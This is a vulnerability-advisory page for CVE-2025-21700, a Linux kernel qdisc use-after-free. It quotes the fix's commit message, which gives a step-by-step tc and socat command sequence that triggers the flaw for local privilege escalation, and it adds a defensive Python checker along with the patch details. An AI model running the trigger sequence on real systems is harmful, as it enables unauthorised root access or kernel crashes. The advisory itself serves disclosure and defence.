Cyber Posture

CVE-2025-21700

Severity: High

Published: 13 February 2025
Modified: 03 November 2025
KEV Added:
Patch:
CVSS Score: 7.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0002 (percentile: 6.2)
Risk Priority: 16 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Description

In the Linux kernel, the following vulnerability has been resolved:

net: sched: Disallow replacing of child qdisc from one parent to another

Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script:

Step 1. create root qdisc
tc qdisc add dev lo root handle 1:0 drr

Step 2. a class for packet aggregation to demonstrate UAF
tc class add dev lo classid 1:1 drr

Step 3. a class for nesting
tc class add dev lo classid 1:2 drr

Step 4. a class to graft qdisc to
tc class add dev lo classid 1:3 drr

Step 5.
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

Step 6.
tc qdisc add dev lo parent 1:2 handle 3:0 drr

Step 7.
tc class add dev lo classid 3:1 drr

Step 8.
tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

Step 9. Display the class/qdisc layout
tc class ls dev lo
class drr 1:1 root leaf 2: quantum 64Kb
class drr 1:2 root leaf 3: quantum 64Kb
class drr 3:1 root leaf 4: quantum 64Kb
tc qdisc ls
qdisc drr 1: dev lo root refcnt 2
qdisc plug 2: dev lo parent 1:1
qdisc pfifo 4: dev lo parent 3:1 limit 1000p
qdisc drr 3: dev lo parent 1:2

Step 10. trigger the bug <=== prevented by this patch
tc qdisc replace dev lo parent 1:3 handle 4:0

Step 11. Redisplay again the qdiscs/classes
tc class ls dev lo
class drr 1:1 root leaf 2: quantum 64Kb
class drr 1:2 root leaf 3: quantum 64Kb
class drr 1:3 root leaf 4: quantum 64Kb
class drr 3:1 root leaf 4: quantum 64Kb
tc qdisc ls
qdisc drr 1: dev lo root refcnt 2
qdisc plug 2: dev lo parent 1:1
qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
qdisc drr 3: dev lo parent 1:2

Observe that
a) parent for 4:0 does not change despite the replace request. There can only be one parent.
b) refcount has gone up by two for 4:0 and
c) both class 1:3 and 3:1 are pointing to it.

Step 12. send one packet to plug
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))

Step 13. send one packet to the grafted fifo
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))

Step 14. let's trigger the UAF
tc class delete dev lo classid 1:3
tc class delete dev lo classid 1:1

The semantics of "replace" is for a del/add _on the same node_ and not a delete from one node (3:1) and add to another node (1:3) as in step 10. While we could "fix" with a more complex approach there could be consequences to expectations so the patch takes the preventive approach of "disallow such config".

Joint work with Lion Ackermann <nnamrec@gmail.com>

Security Summary

CVE-2025-21700 is a use-after-free (UAF) vulnerability in the Linux kernel's networking scheduler subsystem (net/sched), specifically in the handling of traffic control queueing disciplines (qdiscs). The issue arises because a child qdisc could be replaced from one parent class to another, which leaves the qdisc with an inflated reference count and two parent classes pointing to the same qdisc. Kernel versions without the fixing patches are affected (the version ranges are listed under Affected Products below); the invalid state is reached through the tc (traffic control) utility used to configure qdiscs and classes on network devices.

A local attacker with low privileges can exploit this vulnerability by executing a sequence of tc commands to set up a root qdisc, multiple classes, and nested child qdiscs, then performing a replace operation that moves a qdisc (e.g., handle 4:0) from one parent (3:1) to another (1:3). This results in elevated reference counts and dual parenting, enabling a UAF when packets are sent through the affected qdiscs (using tools like socat with specific priorities) followed by class deletions. Successful exploitation allows arbitrary code execution, leading to privilege escalation, with a CVSS v3.1 base score of 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and classification under CWE-416.
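As an added example (not part of the advisory or of the kernel fix), the following Python script parses the tc class ls / tc qdisc ls output format shown in the description and flags the two observable symptoms of the invalid state described above: a leaf qdisc claimed by more than one class, and a child qdisc whose refcnt exceeds 1. The embedded sample is the step 11 listing reproduced from the description; the regular expressions are assumptions about iproute2's output layout, not a documented interface.

```python
import re
from collections import defaultdict

# Constructed sample: the post-replace "tc class ls dev lo" and "tc qdisc ls"
# listings reproduced from step 11 of the advisory description.
CLASS_LS = """\
class drr 1:1 root leaf 2: quantum 64Kb
class drr 1:2 root leaf 3: quantum 64Kb
class drr 1:3 root leaf 4: quantum 64Kb
class drr 3:1 root leaf 4: quantum 64Kb
"""
QDISC_LS = """\
qdisc drr 1: dev lo root refcnt 2
qdisc plug 2: dev lo parent 1:1
qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
qdisc drr 3: dev lo parent 1:2
"""

# Assumed layout of iproute2 output: "class <kind> <classid> ... leaf <handle> ..."
CLASS_RE = re.compile(r"^class\s+\S+\s+(?P<classid>\S+)\s.*?\bleaf\s+(?P<leaf>\S+)")
# Assumed layout: "qdisc <kind> <handle> dev <dev> root|parent <id> [refcnt N] ..."
QDISC_RE = re.compile(
    r"^qdisc\s+\S+\s+(?P<handle>\S+)\s+dev\s+(?P<dev>\S+)\s+"
    r"(?P<root>root|parent\s+\S+)(?:\s+refcnt\s+(?P<refcnt>\d+))?"
)

def shared_leaves(class_ls: str) -> dict:
    """Map each leaf qdisc handle to the classes that claim it, keeping only
    leaves with more than one owner. A healthy tree has exactly one class
    per leaf; more than one is the dual-parent state from step 11."""
    owners = defaultdict(list)
    for line in class_ls.splitlines():
        m = CLASS_RE.match(line)
        if m:
            owners[m["leaf"]].append(m["classid"])
    return {leaf: cls for leaf, cls in owners.items() if len(cls) > 1}

def overheld_child_qdiscs(qdisc_ls: str) -> list:
    """Return handles of non-root qdiscs whose refcnt is above 1. A root
    qdisc legitimately shows refcnt 2 (the device holds a reference); a
    child qdisc at refcnt 2 matches the inflated count from step 11."""
    hits = []
    for line in qdisc_ls.splitlines():
        m = QDISC_RE.match(line)
        if m and m["root"] != "root" and m["refcnt"] and int(m["refcnt"]) > 1:
            hits.append(m["handle"])
    return hits

if __name__ == "__main__":
    print("leaves with multiple parent classes:", shared_leaves(CLASS_LS))
    print("child qdiscs with refcnt > 1:", overheld_child_qdiscs(QDISC_LS))
```

On a patched kernel the replace in step 10 is rejected, so both checks return empty results; a non-empty result on a live host indicates either an unpatched kernel or tampering with the qdisc tree.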

The kernel patches, available in stable repositories, mitigate the issue by disallowing qdisc replacement across different parents, enforcing that replace operations occur only on the same node to prevent invalid configurations. Relevant commits include 38646749d6e12f9d80a08d21ca39f0beca20230d, 46c59ec33ec98aba20c15117630cae43a01404cc, 73c7e1d6898ccbeee126194dcc05f58b8a795e70, 7e2bd8c13b07e29a247c023c7444df23f9a79fd8, and bc50835e83f60f56e9bec2b392fb5544f250fb6f, which implement this preventive restriction as a joint fix with contributor Lion Ackermann.

Details

CWE(s): CWE-416

Affected Products

Vendor: linux
Product: linux kernel
Affected versions: 2.6.12 to 5.4.291; 5.5 to 5.10.235; 5.11 to 5.15.179
